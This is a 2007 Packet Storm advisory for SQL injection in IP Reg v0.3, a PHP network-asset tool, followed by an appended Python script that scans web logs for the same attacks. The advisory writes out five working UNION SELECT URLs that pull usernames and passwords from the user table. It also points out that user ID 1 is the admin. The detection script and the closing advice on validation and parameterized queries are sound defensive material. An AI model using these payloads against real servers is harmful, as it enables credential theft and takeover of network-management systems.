ipreg-sql.txt

Date: 24 Dec 2007 00:00:00
Reported by: MhZ91
Type: packetstorm
Source: packetstormsecurity.com

Ip Reg v0.3 - Remote Sql Injection in IPAM too

Code
`---------------------------------------------------------------  
  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
  
---------------------------------------------------------------  
  
Multiple Remote Sql Injection  
  
---------------------------------------------------------------  
  
# Author: MhZ91   
# Title: Ip Reg v0.3 - Remote Sql Injection  
# Download: http://sourceforge.net/project/showfiles.php?group_id=211757  
# Bug: Remote Sql Injection  
# Info: IP Reg is an IPAM tool to keep track of assets, nodes (IP addresses, MAC addresses, DNS aliases) within different subnets, over different locations or even VLANs. Written in PHP, use it with a MySQL database to have a unique insight into your local network  
# Visit: http://www.inj3ct-it.org  
  
---------------------------------------------------------------  
  
http://[site]/vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/assetclassgroupview.php?assetclassgroup_id='+union+select+1,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
http://[site]/nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*  
  
There are other SQL injections as well.  
  
To get the user name, password and status of the members, you must replace [UserID] with a number. The number 1 is the default ID of the admin.  
---------------------------------------------------------------  
`
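For defenders reviewing web server logs of an IP Reg install, the following added example (not part of the original advisory or of IP Reg) flags requests to the scripts listed above whose id parameter is not a plain integer. It assumes these ids are always numeric in legitimate use; the log lines and the `/ipreg/` path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> id parameter, as listed in the advisory's URLs.
ID_PARAMS = {
    "vlanview.php": "vlan_id",
    "vlanedit.php": "vlan_id",
    "vlandel.php": "vlan_id",
    "assetclassgroupview.php": "assetclassgroup_id",
    "nodelist.php": "subnet_id",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (Apache common log format; the /ipreg/ path is assumed).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Dec/2007:10:00:01 +0000] "GET /ipreg/vlanview.php?vlan_id=3 HTTP/1.1" 200 2311',
    '192.0.2.77 - - [24/Dec/2007:10:02:13 +0000] "GET /ipreg/vlanview.php?vlan_id=\'+union+select+1,2,3/* HTTP/1.1" 200 2410',
    '192.0.2.77 - - [24/Dec/2007:10:02:20 +0000] "GET /ipreg/nodelist.php?subnet_id=%27+union+select+1,2,3,4,5,6,7,8/* HTTP/1.1" 200 5120',
    '192.0.2.10 - - [24/Dec/2007:10:05:42 +0000] "GET /ipreg/nodelist.php?subnet_id=12&page=2 HTTP/1.1" 200 4870',
    '192.0.2.10 - - [24/Dec/2007:10:06:00 +0000] "GET /ipreg/index.php?q=o\'brien HTTP/1.1" 200 900',
]

def suspicious_id(line):
    """Return (script, param, decoded value) if an id parameter is not an integer."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = ID_PARAMS.get(script)
    if param is None:
        return None  # not one of the scripts named in the advisory
    # parse_qsl URL-decodes the value, so %27 and a literal quote look the same.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == param and not re.fullmatch(r"\d+", value):
            return script, param, value
    return None

def scan(lines):
    """Return one tuple per flagged request, in log order."""
    return [hit for hit in map(suspicious_id, lines) if hit]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"{script}: {param}={value!r}")
```

The same integer-only rule is the natural server-side validation for these parameters, combined with parameterized queries in the application itself.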
